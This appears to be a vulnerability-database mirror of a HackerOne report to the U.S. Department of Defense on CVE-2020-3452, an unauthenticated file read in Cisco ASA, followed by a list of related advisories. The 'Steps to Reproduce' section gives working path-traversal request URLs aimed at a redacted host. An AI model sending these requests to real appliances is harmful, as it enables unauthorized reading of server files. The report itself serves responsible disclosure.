Lucene search
GhostxsecH1:1555021HistoryApr 29, 2022 - 10:49 p.m.
U.S. Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA
2022-04-2922:49:28
ghostxsec
hackerone.com
120
0.975 High
EPSS
Percentile
100.0%
i found out that https://█████████/ was vulnerable to CVE-2020-3452
The IP has a SSL certificate pointing to █████████
curl -kv https://██████████/
Output
Server certificate:
* subject: C=US; ████.mil
Impact
Anyone can read any file present on the server.
System Host(s)
███
Affected Product(s) and Version(s)
CVE Numbers
CVE-2020-3452
Steps to Reproduce
You can test it by visiting the URL:
- https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2BCSCOE%2B/portal_inc.lua
- https://███████/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../
Suggested Mitigation/Remediation Actions
Related
nessus
nessus
packetstorm
packetstorm
Cisco Adaptive Security Appliance Software 9.11 Local File Inclusion
2020-07-29 00:00:00
Cisco ASA / FTD 9.6.4.42 Path Traversal
2020-10-11 00:00:00
Cisco ASA 9.14.1.10 / FTD 6.6.0.1 Path Traversal
2020-12-15 00:00:00
zdt
zdt
hackerone
hackerone
checkpoint_advisories
checkpoint_advisories
Cisco Adaptive Security Appliance Directory Traversal (CVE-2020-3452)
2020-07-28 00:00:00
githubexploit
githubexploit
Exploit for Improper Input Validation in Cisco Adaptive Security Appliance
2020-07-24 00:39:11
Exploit for Improper Input Validation in Cisco Adaptive Security Appliance
2020-08-03 11:02:23
Exploit for Improper Input Validation in Cisco Adaptive Security Appliance
2020-09-28 05:00:37
cisco
cisco
nuclei
nuclei
nvd
nvd
CVE-2020-3452
2020-07-22 20:15:11
prion
prion
Directory traversal
2020-07-22 20:15:00
cve
cve
CVE-2020-3452
2020-07-22 20:15:11
cisa_kev
cisa_kev
Cisco ASA and FTD Read-Only Path Traversal Vulnerability
2021-11-03 00:00:00
cvelist
cvelist
exploitdb
exploitdb
Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
2020-12-15 00:00:00
Cisco ASA and FTD 9.6.4.42 - Path Traversal
2020-10-12 00:00:00
Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
2020-07-28 00:00:00
attackerkb
attackerkb
CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability
2020-07-22 00:00:00
impervablog
impervablog
threatpost
threatpost
Cisco ASA Bug Now Actively Exploited as PoC Drops
2021-06-25 16:08:38
Attackers Exploiting High-Severity Network Security Flaw, Cisco Warns
2020-07-27 16:23:16
Cisco Network Security Flaw Leaks Sensitive Data
2020-07-23 19:49:49
thn
thn
Cisco ASA Flaw Under Active Attack After PoC Exploit Posted Online
2021-06-28 06:39:00
